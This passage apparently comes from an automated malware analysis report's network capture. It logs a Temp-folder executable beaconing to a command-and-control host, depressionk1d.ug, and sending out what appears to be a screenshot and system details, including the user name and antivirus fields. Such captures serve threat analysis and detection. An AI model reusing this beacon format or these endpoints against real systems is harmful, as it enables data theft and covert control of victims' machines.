                          Nov 12, 2021 22:24:13.457895994 CET10878OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:24:13.457931995 CET10883OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:24:13.457947016 CET10885OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:24:13.457964897 CET10891OUTData Raw: 99 5b 6d 34 a5 5a 2b ed 4c 29 50 e2 5a 99 54 a5 46 56 ae 14 a6 14 a8 70 34 53 29 95 a6 95 ab 45 29 8c 95 9b 81 a2 99 54 8a 69 5a 9c ad 30 ad 66 e2 68 a4 40 45 34 8a 9c af ad 30 ad 43 45 a9 11 52 53 c8 a4 c5 45 8a 19 46 29 c4 52 11 48 a1 b4 52 e2
                          Data Ascii: [m4Z+L)PZTFVp4S)E)TiZ0fh@E40CERSEF)RHRQ`\QC1N)aG-qq5tRPzW'T=vS9KyYaQj:a$vwVn<1k5zKq=9pnOxsUEq}"]$2Yez
                          Nov 12, 2021 22:24:13.457978010 CET10893OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:24:13.457987070 CET10895OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:24:13.458005905 CET10898OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:24:13.528306961 CET10970INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:13 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          27192.168.2.449811178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:24.719150066 CET3341OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:24.719284058 CET3342OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:24.719542980 CET3352OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:24.719753981 CET3354OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:24.743607998 CET3360OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:24.743645906 CET3365OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:24.743671894 CET3373OUTData Raw: 8a 5a 5c 53 24 4c 52 81 4a 05 2e 29 89 b1 b4 62 9f 8a 31 45 85 71 98 a5 c5 3b 14 b8 a7 60 b8 dc 51 b6 9f 8a 5c 53 b0 ae 33 6d 1b 6a 4d b4 6d a7 61 73 11 ed a3 6d 4b 8a 36 d1 ca 1c c4 3b 28 2b 53 ed a4 db 4f 94 39 88 0a d3 4a d5 82 b4 85 2a 79 46
                          Data Ascii: Z\S$LRJ.)b1Eq;`Q\S3mjMmasmK6;(+SO9J*yFV+M)VJJTVI)HVV+L)RZ9ZiiSL"""RM"&0LSIRUE!PwE!Ph7CJ*|lx_BJ:5i1|xss7RM
                          Nov 12, 2021 22:23:24.743721008 CET3380OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:24.769128084 CET3388OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:24.769165039 CET3391OUTData Raw: 61 82 fe 55 f8 9d 67 c5 9b 54 b0 f8 61 15 9c 45 8c 70 4b 04 4a 58 f2 42 82 06 7d f8 af 9e ab bd f1 67 c5 1b ef 16 e8 6d a5 dc e9 d6 f0 21 91 64 0f 13 b6 41 1f 5f ad 70 55 78 78 4e 31 7c db dc 55 e5 19 49 72 ed 60 a5 a4 a2 b7 30 0a 29 45 06 80 0a
                          Data Ascii: aUgTaEpKJXB}gm!dA_pUxxN1|UIr`0)E(4;Pzm8P@:AKLBh0E%-Mj-Q@Rm(!L8UNDQL)TKN"GR3N+Si0m(H\QLC?0SZ%)hD@RFSMT'GjL
                          Nov 12, 2021 22:23:24.769220114 CET3410OUTData Raw: 24 f0 cc b2 e9 b1 5d c5 a9 69 f2 49 34 13 5c c1 6a 0c a2 59 a3 89 98 3b 2e 50 2f f0 31 c1 60 70 3a 76 aa e9 a1 dd 3e a7 05 80 96 df cd 9a c8 5f 29 dc 76 88 fc 93 36 0f 1d 76 8f a6 7b f7 ab 17 1e 23 58 b4 0d 2a d2 c2 da cc ea 31 d9 5c 41 35 d9 8e
                          Data Ascii: $]iI4\jY;.P/1`p:v>_)v6v{#X*1\A5A%iTuH@#4?AiDi@`v0wv{c5VIw4[?wWu<j)d2x*pH#SxjKIYuO,Bw@dHjC}&_-r[+YE+9
                          Nov 12, 2021 22:23:24.816281080 CET3451INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:24 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          270192.168.2.450092178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:13.468662977 CET10899OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:13.494066954 CET10950INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:13 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          271192.168.2.450093178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:13.628390074 CET10970OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:13.650666952 CET10972INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:13 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:24:13.650681973 CET10972INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          272192.168.2.450094178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:13.796094894 CET10990OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:13.821192980 CET10990INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:13 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          273192.168.2.450095178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:13.965653896 CET10991OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:13.990986109 CET10991INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:13 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          274192.168.2.450096178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:14.123087883 CET10992OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:14.152192116 CET10992INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:14 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          275192.168.2.450097178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:14.298930883 CET10993OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:14.324970961 CET10993INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:14 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          276192.168.2.450098178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:14.468441963 CET10994OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:14.493515968 CET10994INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:14 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          277192.168.2.450099178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:24:14.624311924 CET10995OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:24:14.650727034 CET10995INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:24:14 GMT
                          Content-Type: text/html
